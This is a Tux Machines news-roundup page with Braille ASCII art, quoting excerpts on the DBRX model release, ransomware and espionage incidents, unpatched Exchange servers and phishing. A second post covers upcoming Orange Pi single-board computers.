⠀⠀⠀⠀⠀⠀⠈⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣣⣜⠟⠀⠀⠀⣰⡿⠟⠛⠛⠛⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⣿⣿⣿⣯⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠸⢋⣴⣂⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣋⣉⡥⠀⠀⢻⣿⣿⣿⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⢿⣿⣿⣿⣿⣿⣿⣿⠁⣤⣶⣄⢠⣿⣿⠋⠀⠀⠀⠀⣿⣷⡘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣿⣿⣿⠿⠟⢸⣿⣿⣿⣾⣿⣿⠀⠀⠀⠁⠀⠸⠿⠇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠈⠀⠀⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡿⠀⢀⣈⣿⣿⣿⡿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⣧⡀⠀⠀⠀⢀⣼⣿⡿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣷⣴⣿⣿⡇⢈⣭⣥⣼⣿⡟⠁⠀⠀⠀⣀⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣝⡛⠲⠿⠿⢟⣫⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣶⣿⣿⣿⣿⣿⣿⣷⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⣈⣻⣿⣿⣿⣿⣿⣿⣿⣤⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⢏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠜⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡼⠙⣻⣿⡇⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠈⢆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠊⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡀⣿⣿⣷⣾⣿⣿⣷⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠈⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣶⣶⣷⣶⣶⡄⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡈⠻⣿⣿⣿⣿⣿⠞⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢀⣤⣶⣿⣿⣿⣶⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠈⠻⠿⣿⣿⣿⣿⣿⣿⡿⠛⢣⣤⡈⠙⠛⠉⠁⢰⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⣯⣠⣿⣿⣿⣷⣶⣶⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⠁⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠙⢻⣿⣿⣟⣥⣼⣿⣿⣿⣿⡿⠋⠀⠀⣈⣻⠛⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⢿⣿⣿⣿⣷⡄⠀⣰⣧⣶⣿⣿⣿⣧⣤⣻⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠿⠿⠿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠿⣿⣿⣿⡟⠀⣹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⢿⣿⡿⠟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⣻⠿⠶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⢿⡟⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣄⣀⣠⠃⠀⠀⠹⣿⣿⣿⣿⣿⣿⣿⠿⠁⠀⠀⠀⢣⢀⣀⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠛⠛⠻⠿⠟⠿⠿⠟⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠈⠙⠛⠻⠿⡿⠿⢿⣿⠿⠿⠿⠿⠿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ䷩ 𝚕𝚒𝚗𝚎 2112 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Openwashing_and_Microsoft_s_Awful_Security.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Openwashing_and_Microsoft_s_Awful_Security.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Openwashing and Microsoft's Awful Security⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * § Openwashing⠀➾ o ⚓ Wired ☛ Inside_the_Creation_of_DBRX,_the_World's_Most_Powerful Open_Source_AI_Model⠀⇛ Databricks will release DBRX under an open source license, allowing others to build on top of its work. Frankle shared data showing that across about a dozen or so benchmarks measuring the AI model’s ability to answer general knowledge questions, perform reading comprehension, solve vexing logical puzzles, and generate high-quality code, DBRX was better than every other open source model available. * § Windows TCO⠀➾ o ⚓ The Register UK ☛ INC_Ransom_claims_responsibility_for_attack_on NHS_Scotland⠀⇛ In typical fashion for modern-day ransomware and extortion groups, INC has published a snippet of the alleged total 3TB of data it stole from the healthcare group. The data types that appear to be in the hands of cybercriminals include patients' medical test results (adults and young children), medication information, and their full names and home addresses. The full names and contact details of medical professionals are also visible. o ⚓ The Register UK ☛ Critical_infrastructure_cyberattack_reporting rules_proposed⠀⇛ President Joe Biden signed CIRCIA into law in March 2022, and that set a timer for the US Cybersecurity and Infrastructure Agency (CISA), which had two years to propose a rule. As proposed, the 447-page rule [PDF] would require organizations that fall under any of the United States' 16 critical infrastructure sectors to report "substantial cyber incidents" within 72 hours of discovering them. This essentially includes any digital intrusion that leads to substantial harm, poses a significant threat to the organization's ability to function, or threatens national security, public health, or safety. It also would require these organizations to report ransom payments within 24 hours. o ⚓ The Record ☛ Russian_researchers_say_espionage_operation_using WinRAR_bug_is_linked_to_Ukraine⠀⇛ To deliver PhantomRAT into victims’ systems, the hackers used phishing emails containing a PDF file disguised as a contract, along with an attached RAR archive protected by a password sent within the email. PDF files are a common lure in cyberespionage campaigns. An executable file in the archive only launched when the PDF file was opened by a user with a WinRAR version earlier than 6.23. o ⚓ The Record ☛ German_cyber_agency_warns_17,000_Microsoft_Exchange servers_are_vulnerable_to_critical_bugs⠀⇛ According to a report by the German Federal Office for Information Security (BSI), at least 17,000 servers are vulnerable to one or more critical bugs, and cybercriminals and state actors are already actively exploiting several of these vulnerabilities to deliver malware and carry out cyberespionage or ransomware attacks. The agency didn’t provide specific examples but said that local schools, universities, medical facilities, judicial services, local governments and medium-sized businesses are particularly under threat. The BSI said that it has warned about the active exploitation of critical vulnerabilities in Microsoft Exchange several times since 2021 and temporarily declared the IT threat situation “red.” o ⚓ [Repeat] The Register UK ☛ Germany_warns_of_17,000_unpatched Microsoft_Exchange_servers⠀⇛ The German Federal Office for Information Security (BIS) has issued an urgent alert about the poor state of Microsoft Exchange Server patching in the country. The government regulator says there are 17,000 or more Exchange Server instances in Germany vulnerable to at least one critical vulnerability, out of around 45,000 public-facing servers in the Euro nation running the software. o ⚓ BBC ☛ Payout_for_Uber_Eats_driver_over_face_scan_bias_case [Ed: Typical_Microsoft]⠀⇛ A black Uber Eats driver has received a payout after "racially discriminatory" facial-recognition checks prevented him accessing the app to secure work. When Pa Edrissa Manjang began working for Uber Eats, in November 2019, its app did not regularly ask him to send selfies in order to register for jobs. But the Microsoft-powered Uber Eats app increased these verification checks. And in 2021, it said after "careful consideration" his account would be removed, due to "continued mismatches". * § Integrity/Availability/Authenticity⠀➾ o ⚓ 404 Media ☛ Criminals_Are_Weaponizing_Child_Abuse_Imagery_to_Ban Discord_Servers⠀⇛ In an unusual weaponization of content moderation tools, members of hacking and fraud focused Discord servers are deliberately uploading child abuse imagery to have their rivals’ servers shut down, 404 Media has found. o ⚓ Krebs On Security ☛ Thread_Hijacking:_Phishes_That_Prey_on_Your Curiosity⠀⇛ Thread hijacking attacks. They happen when someone you know has their email account compromised, and you are suddenly dropped into an existing conversation between the sender and someone else. These missives draw on the recipient’s natural curiosity about being copied on a private discussion, which is modified to include a malicious link or attachment. Here’s the story of a recent thread hijacking attack in which a journalist was copied on a phishing email from the unwilling subject of a recent scoop. ䷩ 𝚕𝚒𝚗𝚎 2299 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Orange_Pi_Developer_Conference_2024_upcoming_Orange_Pi_SBCs_and.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Orange_Pi_Developer_Conference_2024_upcoming_Orange_Pi_SBCs_and.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Orange Pi Developer Conference 2024, upcoming Orange Pi SBCs and products⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Orange_Pi_Watch_D_Pro_presented_by_Junichi_Yamagishi⦈_ That board is the Orange Pi 4A SBC with an eMMC flash module socket instead of a soldered-in eMMC flash chip and an M.2 Key-M socket for an NVMe SSD. It will run Ubuntu, Debian, or Android 13 with Linux 5.15. While the name is similar to the Orange Pi 4 LTS with Rockchip RK3399, it’s based on the Allwinner A527 SoC. Orange Pi 5 Pro and Orange Pi 5 Max powered by Rockchip RK3588S/RK3588 are coming soon. There’s already a product page for the Pro version, but Orange Pi confirmed the Max model will be based on Rockchip RK3588 with a WiFi 5 module and an M.2 PCIe 3.0 socket for SSD, while the Orange Pi 5 Pro – which should be up for sale soon – features a RK3588S SoC, a WiFi 5 module, and an M.2 PCIe 2.1 socket for SSD. Both boards have about the same port layout. Read_on ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⡟⠁⠀⠀⠀⠀⠀⠀⢀⠊⠁⠙⢿⣿⣿⣿⠋⠹⠀⠀⠀⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⡿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⡿⠋⠀⢠⡄⠀⠀⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠐⠒⠒⠒⠂⠀⠀⠀⠂⠂⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⠀⠀⠀⠀⠤⠤⡤⠤⠀⠀⠀⠀⠆⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⡟⢛⣿⣿⣿⣟⣿⣿⡿⣿⢿⣻⣿⡿⣿⣛⣻⢟⣿⣿⡟⣿⡿⠛⠛⠻⣻⣿⢟⣿⣿⡿⣿ ⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢾⠀⠀⢀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣷⣷⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣷⣷⣷⣾⣶⠀⠀⠀⣷⣿⣾⣿⣿⣿⣿ ⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣍⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⣿⣿⡿⠸⣦⠀⠀⠈⣯⣽⣿⣿⣏⣿ ⣿⣿⣿⣄⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣟⣿⡟⢻⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⣄⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡆⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣷⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡄⠀⠀⠀⣀⣀⣀⣀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠈⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣷⣤⣄⣤⣤⣤⣤⣀⣠⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠸⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⣿⣿⣿⣿⣿⣿ ⠟⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠃⠀⠀⠀⠙⠛⠛⠛⠛⠛ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 